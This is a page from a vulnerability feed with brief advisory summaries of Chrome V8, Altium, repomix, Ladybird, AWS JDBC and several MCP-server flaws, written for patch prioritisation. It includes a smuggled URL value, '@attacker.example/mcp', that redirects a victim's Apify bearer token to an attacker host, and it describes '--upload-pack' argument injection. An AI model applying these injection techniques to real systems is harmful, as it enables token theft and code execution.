Code Injection RCE
NVD GitHub VulDB
EPSS 1% CVSS 9.4
CRITICAL PATCH Act Now

Privilege-escalating remote code execution in the Git Service shared by Altium Enterprise Server and Altium 365 lets an authenticated user with basic git access abuse post-clone file-manipulation operations to move arbitrary files outside the repository, plant executable script content, and run code as the Git Service account. On multi-tenant Altium 365 cloud nodes this also created a cross-tenant data-exposure path. No public exploit identified at time of analysis; the CVSS 4.0 score of 9.4 (Critical) reflects full confidentiality, integrity and availability impact with only low privileges required.

Path Traversal RCE
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Google Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use-after-free in Chrome's V8 JavaScript engine (versions before 150.0.7871.46) lets a remote attacker achieve arbitrary code execution inside the renderer sandbox by luring a victim to a crafted HTML page. Chromium rated this Medium severity, but the CVSS 8.8 reflects high confidentiality, integrity, and availability impact requiring only a single user click; there is no public exploit identified at time of analysis and CISA's SSVC framework records no known exploitation. Because scope is unchanged (S:U), code execution is confined to the sandbox and does not by itself constitute a full host compromise.

Memory Corruption Google Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows an attacker to run arbitrary code inside the renderer sandbox when a victim visits a crafted HTML page. The flaw is a use-after-free (CWE-416) reported by Google's own Chrome team; Chromium rated it Medium severity while NVD assigns CVSS 8.8. No public exploit has been identified at time of analysis, and CISA's SSVC framework records exploitation status as 'none'.

Memory Corruption Google Denial Of Service +3
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

Memory Corruption Google Denial Of Service +3
NVD
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Arbitrary code execution within the renderer sandbox in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) can be triggered when a victim loads a crafted HTML page. The flaw stems from use of uninitialized memory in V8 and, while carrying a high CVSS base score of 9.6, was rated only Low severity by Chromium because code execution is confined inside the renderer sandbox and still requires a separate sandbox escape for full host compromise. No public exploit identified at time of analysis, and CISA's SSVC framework marks exploitation status as none.

RCE Google Suse
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (all channels prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is a CWE-843 type-confusion bug rated High by Chromium and CVSS 8.8; there is no public exploit identified at time of analysis and CISA's SSVC framework marks exploitation status as none. Because CVSS is AV:N/PR:N with UI:R, exploitation is unauthenticated but requires the victim to open a malicious page.

Memory Corruption RCE Google +1
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Out of bounds write in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

Memory Corruption RCE Buffer Overflow +2
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is an integer overflow in V8, rated High by Chromium and scored CVSS 8.8; exploitation requires user interaction (visiting a malicious page) but no authentication. There is no public exploit identified at time of analysis, and CISA SSVC records exploitation status as none, indicating no observed in-the-wild activity yet.

RCE Google Suse
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

RCE Google Privilege Escalation +1
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)

RCE Google Buffer Overflow +1
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in the V8 JavaScript engine of Google Chrome before 150.0.7871.46 allows a remote attacker who lures a victim to a crafted HTML page to execute arbitrary code — though notably only within the renderer sandbox rather than achieving full host compromise. Rated CVSS 8.8 and stemming from a code-generation flaw (CWE-94) in V8, it affects all Chrome desktop installations on the vulnerable channel; a fix has shipped, but there is no public exploit identified at time of analysis and CISA SSVC records exploitation status as none.

Code Injection Google RCE +1
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

SQL injection in the UTT nv518G security gateway (firmware nv518GV3v3.2.7-210919-161313) lets remote attackers inject arbitrary SQL through the gohead/sub_463bbc component, which per the advisory escalates to arbitrary code execution on the device. The flaw is unauthenticated (CVSS 9.8, PR:N) and publicly available exploit code exists via a GitHub write-up, though it is not listed in CISA KEV; EPSS is low at 0.27% (18th percentile), indicating no evidence of widespread automated exploitation yet.

SQLi RCE
NVD GitHub
CVSS 8.1
HIGH POC PATCH This Week

Apify API token exfiltration in @apify/actors-mcp-server 0.10.7 lets a remote attacker steal a victim's bearer credential via URL authority injection (CWE-918/SSRF). Because getActorMCPServerURL() naively concatenates a trusted standby base URL with an attacker-controlled webServerMcpPath from an Actor definition, an Actor published with a value like '@attacker.example/mcp' causes the WHATWG URL parser to resolve the outbound connection to the attacker's host, and connectMCPClient() unconditionally forwards the victim's 'Authorization: Bearer <APIFY_TOKEN>' header there. Publicly available exploit code exists (a Docker-based PoC that captures the token on an attacker HTTPS server); no active exploitation is confirmed.

Python SSRF OpenSSL +3
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Arbitrary code execution in Amazon's AWS Advanced JDBC Wrapper (versions 3.3.0 through 4.0.0) arises from the RemoteQueryCachePlugin deserializing cached query results from Redis or Valkey via a raw ObjectInputStream with no class filtering. An actor able to write to the shared cache can poison entries with a crafted serialized Java object, triggering gadget-chain execution on every application server that later reads that cache entry. No public exploit identified at time of analysis; risk is elevated because a single poisoned cache key fans out to all consuming app servers.

Deserialization Java Redis +2
NVD GitHub
EPSS 0% CVSS 8.9
HIGH POC This Week

Reachable code execution in the Ladybird browser arises from a dangling-reference flaw (CWE-825) in the WebAssembly ESM-integration module loader, where a stack-local Wasm::FunctionType is captured by reference and read after destruction. A malicious web page can chain the resulting stale result-type data into an arbitrary write via the WASM-GC array.set handler and gain code execution in the WebContent process. Reported by VulnCheck with publicly available exploit code exists; it is not listed in CISA KEV, so no confirmed active exploitation, but a working PoC lowers the barrier for weaponization.

RCE Ladybird
NVD GitHub
EPSS 1% CVSS 7.5
HIGH POC PATCH This Week

Arbitrary command execution in repomix (npm package, versions < 1.14.1) arises from argument injection in the `--remote-branch` CLI option, whose value is passed unsanitized into `git fetch` and `git checkout` subprocesses within `src/core/git/gitCommand.ts`. Because the branch value is not prefixed with a `--` positional delimiter and skips the `dangerousParams` blocklist that `validateGitUrl()` applies only to the URL, an attacker can inject options such as `--upload-pack` and, combined with an SSH or `file://` remote, execute an arbitrary payload binary with the invoking user's privileges. Publicly available exploit code exists, no active exploitation is confirmed (not in CISA KEV), and the flaw is fixed in v1.14.1.

RCE
NVD GitHub VulDB
HIGH POC PATCH This Week

Local arbitrary code execution in the Cortex MCP server (neuro-cortex-memory ≥ 3.17.0) lets an attacker run Python with the victim's user privileges when the open_visualization tool trusts the Claude Code-supplied CLAUDE_PROJECT_DIR as a Cortex developer checkout. Any project a victim opens is treated as a candidate source root, and validation only checks for two trivial marker files (mcp_server/ and ui/unified-viz.html) before executing an attacker-supplied visualize_bootstrap.py via subprocess. A working PoC is included in the advisory; there is no evidence of active exploitation, and the issue is fixed in v3.17.1.

Python RCE
NVD GitHub
CVSS 4.3
MEDIUM PATCH This Month

SSRF policy bypass in jshookmcp 0.3.1 allows an authenticated MCP client with network domain access to probe internal RFC 1918 and reserved addresses that are explicitly blocked by all other network tools on the same server. The `network_icmp_probe` and `network_traceroute` handlers call `resolveHostname` directly without invoking the central `resolveAuthorizedTransportTarget` guard, creating an inconsistent enforcement boundary. No CISA KEV listing exists, but proof-of-concept test code demonstrating the bypass via the `handleCallTool` dispatch path is included in the GitHub advisory (GHSA-c5r6-m4mr-8q5j), confirming exploitability without external traffic.

SSRF Microsoft Node.js +2
NVD GitHub
Prev Page 4 of 355 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy